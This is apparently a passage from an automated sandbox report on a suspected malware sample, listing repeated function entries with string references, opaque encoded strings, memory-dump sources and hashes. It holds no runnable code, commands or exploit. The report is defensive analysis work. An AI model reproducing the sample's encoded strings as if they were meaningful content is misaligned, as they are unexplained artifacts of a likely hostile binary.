                            • Instruction Fuzzy Hash: EEC04C126959212D395933A53C07DEF024E9D96721B16016FFA80AA5D25C892C8581FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 004086EE
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • dfd6166c1b242959df16a7891453e0c7e9f783073c64e6e084daa67f4766fe1381aaddc04a018f95ec9bc1f5f35bf980c51f48ce4e0384d99c6174d4b1afdbaeb13235168e2d5194a840dcb61cc342e92a6aaa3ca0231e45e22e2764fe92cf55, xrefs: 004086E8, 004086ED, 004086F5
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: dfd6166c1b242959df16a7891453e0c7e9f783073c64e6e084daa67f4766fe1381aaddc04a018f95ec9bc1f5f35bf980c51f48ce4e0384d99c6174d4b1afdbaeb13235168e2d5194a840dcb61cc342e92a6aaa3ca0231e45e22e2764fe92cf55
                            • API String ID: 4000879885-3047839149
                            • Opcode ID: 52f138f5f3c4758fb06156ed658a7e869c0c64f69568de72edf7b48565dcd7a0
                            • Instruction ID: 74496edd26b83049336a924a703b8acea00f5dc567d2fb9a3aafc87a4f3f1b70
                            • Opcode Fuzzy Hash: 52f138f5f3c4758fb06156ed658a7e869c0c64f69568de72edf7b48565dcd7a0
                            • Instruction Fuzzy Hash: 59C04C225965312D3D4933993807EEE129E9D46320B15006FF540A65D25C892C8142FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 004086A2
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040869C, 004086A1, 004086A9
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: 46f9ab46924a15d9fade5a833f096f983514fa063c6a63bbe3199452343a6224
                            • Instruction ID: 0288b0a33f127923fdc175bcc9e4f226d07a171e5f468928065520b70e5e6145
                            • Opcode Fuzzy Hash: 46f9ab46924a15d9fade5a833f096f983514fa063c6a63bbe3199452343a6224
                            • Instruction Fuzzy Hash: 2EC04C165956312D3D853355380BDEF024E9D9A720B16017FB940656D26D892C8181FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 004048EA
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 004048E4, 004048E9, 004048F1
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: cb66ab9859d84a741034d9066d5ef1e0ad11e0a5931de845d7aefba0c31e4078
                            • Instruction ID: 12941ef5300d5d3ca1d48400a836db727a3aa57d222af7125f71995f6a6bb9da
                            • Opcode Fuzzy Hash: cb66ab9859d84a741034d9066d5ef1e0ad11e0a5931de845d7aefba0c31e4078
                            • Instruction Fuzzy Hash: 31C04C125966302D3D8532653817EEE025E8D56721F1A006FF544695D25C891C8192FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00402AE5
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00402ADF, 00402AE4, 00402AEC
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: af2fdc16549afdd7053b4f93b146f0a5835cd97348ddc046397c92d47fcac9c4
                            • Instruction ID: 663f77395931ad928d018b832c8a80838be7224243435c2140bfc78c987bc14c
                            • Opcode Fuzzy Hash: af2fdc16549afdd7053b4f93b146f0a5835cd97348ddc046397c92d47fcac9c4
                            • Instruction Fuzzy Hash: 11C04C125D56302D39853255380BDEE025E8D56720B16007FFA40655D65C891D8186FF
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040CA8B
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040CA85, 0040CA92
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: 6276a9d0b93414d90e90e31375a2c00142c6ef80445f8f85f060e4b95383e300
                            • Instruction ID: 4ffc46775f5eb4f1bce176144216cd53af0bd79fecfd64caa3f21755272c7365
                            • Opcode Fuzzy Hash: 6276a9d0b93414d90e90e31375a2c00142c6ef80445f8f85f060e4b95383e300
                            • Instruction Fuzzy Hash: 9BC04C225957312D3D8573A57C07DEA124E8D56720B16017FB685655D25C882C8185FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040AB1E
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040AB18, 0040AB1D, 0040AB25
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: a4c2e320fcbd13dd0b23e06fff12f430240279764f8e309c687d31aece20bfae
                            • Instruction ID: ad4ebcbc0a8346865d7247a4bd0e6c99cbf8780e4a0df1b70d48cffb608485de
                            • Opcode Fuzzy Hash: a4c2e320fcbd13dd0b23e06fff12f430240279764f8e309c687d31aece20bfae
                            • Instruction Fuzzy Hash: E1C04C525957302D394533953907DEA024E8D5A721B1600BFF540655D25C892C8185FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00408F6D
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00408F67, 00408F74
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: 17ea888e38134683cdf63a39112437597a40c98a3643a50a7adb7154dbfdb726
                            • Instruction ID: 25b6a108980f8320795cb07f9d76a86d19351f6e50c10c6e81196ad634ecde63
                            • Opcode Fuzzy Hash: 17ea888e38134683cdf63a39112437597a40c98a3643a50a7adb7154dbfdb726
                            • Instruction Fuzzy Hash: BDC04C125A56302E398532A53D07DEA025E8D56720B16016FF545696D25C892C8181FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 004051DC
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 004051D6, 004051DB, 004051E3
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: e59221f2f58c9023ab2180e1b6b846518b0009eb0d74b970a5a1cd132acaf600
                            • Instruction ID: a72b6a1d3d66b53a737fe09d3f5f2c3c5e8c4145830486a641d466840165291e
                            • Opcode Fuzzy Hash: e59221f2f58c9023ab2180e1b6b846518b0009eb0d74b970a5a1cd132acaf600
                            • Instruction Fuzzy Hash: 44C04C129D56312E394532953807DEE024E9E56720B16006FF544655D35C891D8181FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040D356
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040D350, 0040D35D
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: c0291116a35615347779e152e232d7410a41ec378949e879e0fb3c164c20797a
                            • Instruction ID: 788e81043146d34a204da95c6aaf527042f0c320375d9e9c5808827149d451a4
                            • Opcode Fuzzy Hash: c0291116a35615347779e152e232d7410a41ec378949e879e0fb3c164c20797a
                            • Instruction Fuzzy Hash: 08C04C125956302D394533A53C07DEA128E8D56724B16107FB945655D25C981D8181FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040B3E9
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040B3E3, 0040B3F0
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: f7016eaf5d46032af08ac5e73edf201fb02a8c09319702655e35e9505bc4417b
                            • Instruction ID: 9ea7e63911cbe7384143c5be40584d122255df295a60662729e35affd5050ccb
                            • Opcode Fuzzy Hash: f7016eaf5d46032af08ac5e73edf201fb02a8c09319702655e35e9505bc4417b
                            • Instruction Fuzzy Hash: 99C04C525956302D398533553807DEA125E8D96720B16006FF544656D65D891C8185FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00403458
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00403452, 00403457, 0040345F
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: a88873883395326aecf144e36c4cb31f922a35a7bf53c3a45d6b3de9eaff6cea
                            • Instruction ID: e4219eabbc0be6cdcb4523690851dbfc945d72fc796d06143663a067f437321e
                            • Opcode Fuzzy Hash: a88873883395326aecf144e36c4cb31f922a35a7bf53c3a45d6b3de9eaff6cea
                            • Instruction Fuzzy Hash: 6FC04C1659663029395532593C17DEE024E8D56720B56007FF540A65D35E891C8182FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00401814
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040180E, 00401813, 0040181B
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: 146ca6217d18466d58299d053ba01ef84f1d277f9c12c16192551382db982e26
                            • Instruction ID: fd182bead98460bf8a69c0a98c1d47d876b4f272ad37733376e36c40a964e083
                            • Opcode Fuzzy Hash: 146ca6217d18466d58299d053ba01ef84f1d277f9c12c16192551382db982e26
                            • Instruction Fuzzy Hash: C3C04C525996302D3D4533657817DEA029E9D5A720B16007FF545A65D25C881C8192FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00409988
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00409982, 0040998F
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: 9ecb975c5901ed6d7a556b7a49eb38af3c4b6887b0a968287d8374e01d3ee505
                            • Instruction ID: 1b29e55c750c172269f35e3fd5b5890a0a68579d4ef95ad94b1982a3a30d14aa
                            • Opcode Fuzzy Hash: 9ecb975c5901ed6d7a556b7a49eb38af3c4b6887b0a968287d8374e01d3ee505
                            • Instruction Fuzzy Hash: 3FC04C12599A702D395532553817DEE024E8D57B20B56007FF650A55D25C891C8181FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040BF56
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040BF50, 0040BF5D
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: f43ebf07d7d21ca5baaa8e30ca0dc65b2f0e69079912c4b405532adc23352d62
                            • Instruction ID: 3436170ea041aa1e5de0fee85609c1d8a8328f22e981a0665eda8f3eee515125
                            • Opcode Fuzzy Hash: f43ebf07d7d21ca5baaa8e30ca0dc65b2f0e69079912c4b405532adc23352d62
                            • Instruction Fuzzy Hash: 74C04C22999A302D3D4533A97C07DEA028E8D56730B16017FB541656D65D882C8185FE
                            Uniqueness
